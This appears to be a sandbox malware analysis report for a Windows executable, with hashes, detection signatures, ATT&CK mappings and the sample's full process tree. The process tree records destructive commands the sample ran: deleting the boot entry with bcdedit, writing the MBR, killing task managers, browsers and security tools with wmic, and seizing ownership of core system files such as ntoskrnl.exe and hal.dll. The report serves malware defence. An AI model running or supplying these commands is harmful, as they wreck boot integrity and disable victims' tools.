52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb

Analysis

max time kernel
98s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
10/06/2023, 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

07443099.exe
Size

247KB
MD5

733eb0ab951ae42a8d8cca413201e428
SHA1

640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
SHA256

52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
SHA512

c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
SSDEEP

3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1

Score

8^/10

bootkit discovery exploit persistence

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\rteth.sys	cmd.exe

Possible privilege escalation attempt 25 IoCs

exploit

pid	Process
3436	takeown.exe
4564	takeown.exe
4392	icacls.exe
4672	takeown.exe
848	takeown.exe
4444	takeown.exe
3332	icacls.exe
560	icacls.exe
1216	icacls.exe
4568	icacls.exe
2644	takeown.exe
4728	takeown.exe
2004	takeown.exe
3956	takeown.exe
2600	takeown.exe
2672	icacls.exe
3240	icacls.exe
1936	icacls.exe
4112	icacls.exe
2748	takeown.exe
4616	takeown.exe
968	takeown.exe
2264	icacls.exe
3868	icacls.exe
876	icacls.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	07443099.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	winconfig.exe

Executes dropped EXE 2 IoCs

pid	Process
3964	winconfig.exe
4176	DetectKey.exe

Modifies file permissions 1 TTPs 25 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
848	takeown.exe
4564	takeown.exe
4444	takeown.exe
4392	icacls.exe
3868	icacls.exe
1216	icacls.exe
4568	icacls.exe
3956	takeown.exe
876	icacls.exe
3436	takeown.exe
2748	takeown.exe
2672	icacls.exe
4112	icacls.exe
2600	takeown.exe
4616	takeown.exe
2004	takeown.exe
968	takeown.exe
3332	icacls.exe
2264	icacls.exe
560	icacls.exe
1936	icacls.exe
4672	takeown.exe
4728	takeown.exe
3240	icacls.exe
2644	takeown.exe

Modifies boot configuration data using bcdedit 1 IoCs

pid	Process
2620	bcdedit.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	07443099.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1664	07443099.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2292	WMIC.exe
Token: SeSecurityPrivilege	2292	WMIC.exe
Token: SeTakeOwnershipPrivilege	2292	WMIC.exe
Token: SeLoadDriverPrivilege	2292	WMIC.exe
Token: SeSystemProfilePrivilege	2292	WMIC.exe
Token: SeSystemtimePrivilege	2292	WMIC.exe
Token: SeProfSingleProcessPrivilege	2292	WMIC.exe
Token: SeIncBasePriorityPrivilege	2292	WMIC.exe
Token: SeCreatePagefilePrivilege	2292	WMIC.exe
Token: SeBackupPrivilege	2292	WMIC.exe
Token: SeRestorePrivilege	2292	WMIC.exe
Token: SeShutdownPrivilege	2292	WMIC.exe
Token: SeDebugPrivilege	2292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2292	WMIC.exe
Token: SeRemoteShutdownPrivilege	2292	WMIC.exe
Token: SeUndockPrivilege	2292	WMIC.exe
Token: SeManageVolumePrivilege	2292	WMIC.exe
Token: 33	2292	WMIC.exe
Token: 34	2292	WMIC.exe
Token: 35	2292	WMIC.exe
Token: 36	2292	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2292	WMIC.exe
Token: SeSecurityPrivilege	2292	WMIC.exe
Token: SeTakeOwnershipPrivilege	2292	WMIC.exe
Token: SeLoadDriverPrivilege	2292	WMIC.exe
Token: SeSystemProfilePrivilege	2292	WMIC.exe
Token: SeSystemtimePrivilege	2292	WMIC.exe
Token: SeProfSingleProcessPrivilege	2292	WMIC.exe
Token: SeIncBasePriorityPrivilege	2292	WMIC.exe
Token: SeCreatePagefilePrivilege	2292	WMIC.exe
Token: SeBackupPrivilege	2292	WMIC.exe
Token: SeRestorePrivilege	2292	WMIC.exe
Token: SeShutdownPrivilege	2292	WMIC.exe
Token: SeDebugPrivilege	2292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2292	WMIC.exe
Token: SeRemoteShutdownPrivilege	2292	WMIC.exe
Token: SeUndockPrivilege	2292	WMIC.exe
Token: SeManageVolumePrivilege	2292	WMIC.exe
Token: 33	2292	WMIC.exe
Token: 34	2292	WMIC.exe
Token: 35	2292	WMIC.exe
Token: 36	2292	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4260	WMIC.exe
Token: SeSecurityPrivilege	4260	WMIC.exe
Token: SeTakeOwnershipPrivilege	4260	WMIC.exe
Token: SeLoadDriverPrivilege	4260	WMIC.exe
Token: SeSystemProfilePrivilege	4260	WMIC.exe
Token: SeSystemtimePrivilege	4260	WMIC.exe
Token: SeProfSingleProcessPrivilege	4260	WMIC.exe
Token: SeIncBasePriorityPrivilege	4260	WMIC.exe
Token: SeCreatePagefilePrivilege	4260	WMIC.exe
Token: SeBackupPrivilege	4260	WMIC.exe
Token: SeRestorePrivilege	4260	WMIC.exe
Token: SeShutdownPrivilege	4260	WMIC.exe
Token: SeDebugPrivilege	4260	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4260	WMIC.exe
Token: SeRemoteShutdownPrivilege	4260	WMIC.exe
Token: SeUndockPrivilege	4260	WMIC.exe
Token: SeManageVolumePrivilege	4260	WMIC.exe
Token: 33	4260	WMIC.exe
Token: 34	4260	WMIC.exe
Token: 35	4260	WMIC.exe
Token: 36	4260	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4260	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1664 wrote to memory of 3964	1664	07443099.exe	84
PID 1664 wrote to memory of 3964	1664	07443099.exe	84
PID 1664 wrote to memory of 3964	1664	07443099.exe	84
PID 3964 wrote to memory of 4552	3964	winconfig.exe	85
PID 3964 wrote to memory of 4552	3964	winconfig.exe	85
PID 4552 wrote to memory of 4176	4552	cmd.exe	88
PID 4552 wrote to memory of 4176	4552	cmd.exe	88
PID 4552 wrote to memory of 4176	4552	cmd.exe	88
PID 4552 wrote to memory of 2620	4552	cmd.exe	90
PID 4552 wrote to memory of 2620	4552	cmd.exe	90
PID 4552 wrote to memory of 2292	4552	cmd.exe	91
PID 4552 wrote to memory of 2292	4552	cmd.exe	91
PID 4552 wrote to memory of 4260	4552	cmd.exe	92
PID 4552 wrote to memory of 4260	4552	cmd.exe	92
PID 4552 wrote to memory of 4444	4552	cmd.exe	93
PID 4552 wrote to memory of 4444	4552	cmd.exe	93
PID 4552 wrote to memory of 3396	4552	cmd.exe	96
PID 4552 wrote to memory of 3396	4552	cmd.exe	96
PID 4552 wrote to memory of 572	4552	cmd.exe	97
PID 4552 wrote to memory of 572	4552	cmd.exe	97
PID 4552 wrote to memory of 4392	4552	cmd.exe	98
PID 4552 wrote to memory of 4392	4552	cmd.exe	98
PID 4552 wrote to memory of 1476	4552	cmd.exe	100
PID 4552 wrote to memory of 1476	4552	cmd.exe	100
PID 4552 wrote to memory of 3224	4552	cmd.exe	101
PID 4552 wrote to memory of 3224	4552	cmd.exe	101
PID 4552 wrote to memory of 4568	4552	cmd.exe	102
PID 4552 wrote to memory of 4568	4552	cmd.exe	102
PID 4552 wrote to memory of 2192	4552	cmd.exe	103
PID 4552 wrote to memory of 2192	4552	cmd.exe	103
PID 4552 wrote to memory of 3220	4552	cmd.exe	104
PID 4552 wrote to memory of 3220	4552	cmd.exe	104
PID 4552 wrote to memory of 1080	4552	cmd.exe	105
PID 4552 wrote to memory of 1080	4552	cmd.exe	105
PID 4552 wrote to memory of 2964	4552	cmd.exe	106
PID 4552 wrote to memory of 2964	4552	cmd.exe	106
PID 4552 wrote to memory of 4040	4552	cmd.exe	107
PID 4552 wrote to memory of 4040	4552	cmd.exe	107
PID 4552 wrote to memory of 3560	4552	cmd.exe	108
PID 4552 wrote to memory of 3560	4552	cmd.exe	108
PID 4552 wrote to memory of 2284	4552	cmd.exe	109
PID 4552 wrote to memory of 2284	4552	cmd.exe	109
PID 4552 wrote to memory of 4636	4552	cmd.exe	110
PID 4552 wrote to memory of 4636	4552	cmd.exe	110
PID 4552 wrote to memory of 3904	4552	cmd.exe	111
PID 4552 wrote to memory of 3904	4552	cmd.exe	111
PID 4552 wrote to memory of 2904	4552	cmd.exe	113
PID 4552 wrote to memory of 2904	4552	cmd.exe	113
PID 4552 wrote to memory of 2308	4552	cmd.exe	114
PID 4552 wrote to memory of 2308	4552	cmd.exe	114
PID 4552 wrote to memory of 4120	4552	cmd.exe	115
PID 4552 wrote to memory of 4120	4552	cmd.exe	115
PID 4552 wrote to memory of 3864	4552	cmd.exe	116
PID 4552 wrote to memory of 3864	4552	cmd.exe	116
PID 4552 wrote to memory of 2248	4552	cmd.exe	117
PID 4552 wrote to memory of 2248	4552	cmd.exe	117
PID 4552 wrote to memory of 3648	4552	cmd.exe	118
PID 4552 wrote to memory of 3648	4552	cmd.exe	118
PID 4552 wrote to memory of 5012	4552	cmd.exe	119
PID 4552 wrote to memory of 5012	4552	cmd.exe	119
PID 4552 wrote to memory of 2496	4552	cmd.exe	120
PID 4552 wrote to memory of 2496	4552	cmd.exe	120
PID 4552 wrote to memory of 5084	4552	cmd.exe	121
PID 4552 wrote to memory of 5084	4552	cmd.exe	121

C:\Users\Admin\AppData\Local\Temp\07443099.exe
"C:\Users\Admin\AppData\Local\Temp\07443099.exe"
1⤵
- Checks computer location settings
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Windows\Temp\winconfig.exe
  "C:\Windows\Temp\winconfig.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AE8.tmp\2AE9.tmp\2AEA.bat C:\Windows\Temp\winconfig.exe"
    3⤵
    - Drops file in Drivers directory
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Users\Admin\AppData\Roaming\DetectKey.exe
      "C:\Users\Admin\AppData\Roaming\DetectKey.exe"
      4⤵
      Executes dropped EXE
      PID:4176
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /delete {current}
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='taskmgr.exe' delete /nointeractive
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='perfmon.exe' delete /nointeractive
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4260
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='mmc.exe' delete /nointeractive
      4⤵
      PID:4444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='PartAssist.exe' delete /nointeractive
      4⤵
      PID:3396
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='control.exe' delete /nointeractive
      4⤵
      PID:572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='ProcessHacker.exe' delete /nointeractive
      4⤵
      PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='Security Task Manager.exe' delete /nointeractive
      4⤵
      PID:1476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
      4⤵
      PID:3224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='CCleaner.exe' delete /nointeractive
      4⤵
      PID:4568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='procexp.exe' delete /nointeractive
      4⤵
      PID:2192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='procexp64.exe' delete /nointeractive
      4⤵
      PID:3220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='procexp64a.exe' delete /nointeractive
      4⤵
      PID:1080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='logonui.exe' delete /nointeractive
      4⤵
      PID:2964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='regedit.exe' delete /nointeractive
      4⤵
      PID:4040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='iexplore.exe' delete /nointeractive
      4⤵
      PID:3560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='chrome.exe' delete /nointeractive
      4⤵
      PID:2284
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='firefox.exe' delete /nointeractive
      4⤵
      PID:4636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='opera.exe' delete /nointeractive
      4⤵
      PID:3904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='edge.exe' delete /nointeractive
      4⤵
      PID:2904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='msedge.exe' delete /nointeractive
      4⤵
      PID:2308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='brave.exe' delete /nointeractive
      4⤵
      PID:4120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='wmplayer.exe' delete /nointeractive
      4⤵
      PID:3864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='notepad.exe' delete /nointeractive
      4⤵
      PID:2248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='notepad++.exe' delete /nointeractive
      4⤵
      PID:3648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='taskmgr.exe' delete /nointeractive
      4⤵
      PID:5012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='perfmon.exe' delete /nointeractive
      4⤵
      PID:2496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='logonui.exe' delete /nointeractive
      4⤵
      PID:5084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='ProcessHacker.exe' delete /nointeractive
      4⤵
      PID:2124
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\taskmgr.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2644
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\hal.dll"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3956
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\winload.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2600
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\ntoskrnl.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:848
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\perfmon.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3436
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\resmon.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4564
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\logonui.exe
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4728
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\taskkill.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4672
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\tasklist.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4616
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\tskill.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2748
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\logonui.exe"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2004
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Process Hacker 2"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:968
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\drivers"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='taskmgr.exe' delete /nointeractive
      4⤵
      PID:100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='perfmon.exe' delete /nointeractive
      4⤵
      PID:320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='logonui.exe' delete /nointeractive
      4⤵
      PID:3068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='ProcessHacker.exe' delete /nointeractive
      4⤵
      PID:4496
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3332
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2264
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2672
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4392
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3868
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3240
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:560
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1216
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1936
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4568
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:876
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='taskmgr.exe' delete /nointeractive
      4⤵
      PID:1232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='perfmon.exe' delete /nointeractive
      4⤵
      PID:4220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='logonui.exe' delete /nointeractive
      4⤵
      PID:4280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='ProcessHacker.exe' delete /nointeractive
      4⤵
      PID:4436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2492
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
      4⤵
      PID:4020
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
      4⤵
      PID:1876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3272
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
      4⤵
      PID:4120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2656
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
      4⤵
      PID:2148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4644
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
      4⤵
      PID:4132
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4156
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
      4⤵
      PID:2112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4592
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
      4⤵
      PID:5076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:660
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
      4⤵
      PID:5088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4388
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
      4⤵
      PID:1616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1224
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
      4⤵
      PID:2256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3316
  - - C:\Windows\system32\cacls.exe
      cacls "C:\Windows\System32\drivers" /grant "everyone":F
      4⤵
      PID:4084

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2AE8.tmp\2AE9.tmp\2AEA.bat

Filesize
5KB

MD5
a645734f3bf4a2682cbaf546789ec0c4

SHA1
fafcc11909412bf51f217e12dfaa93a15181a3e2

SHA256
3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0

SHA512
efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d

Download Submit
C:\Users\Admin\AppData\Roaming\DetectKey.exe

Filesize
87KB

MD5
aba9a3cf4e1db4602c25405987b809a6

SHA1
6cd545ea023ce9cdfe76607c6801cc11ff7d9e80

SHA256
490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6

SHA512
e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

Download Submit
C:\Users\Admin\AppData\Roaming\DetectKey.exe

Filesize
87KB

MD5
aba9a3cf4e1db4602c25405987b809a6

SHA1
6cd545ea023ce9cdfe76607c6801cc11ff7d9e80

SHA256
490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6

SHA512
e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

Download Submit
C:\Windows\Temp\winconfig.exe

Filesize
139KB

MD5
11d457ee914f72a436fa4a8a8f8446dd

SHA1
d0308ca82ed9716b667e8e77e9ae013b9af44116

SHA256
c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

SHA512
4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b

Download Submit
C:\Windows\Temp\winconfig.exe

Filesize
139KB

MD5
11d457ee914f72a436fa4a8a8f8446dd

SHA1
d0308ca82ed9716b667e8e77e9ae013b9af44116

SHA256
c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

SHA512
4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b

Download Submit
C:\Windows\Temp\winconfig.exe

Filesize
139KB

MD5
11d457ee914f72a436fa4a8a8f8446dd

SHA1
d0308ca82ed9716b667e8e77e9ae013b9af44116

SHA256
c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

SHA512
4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b

Download Submit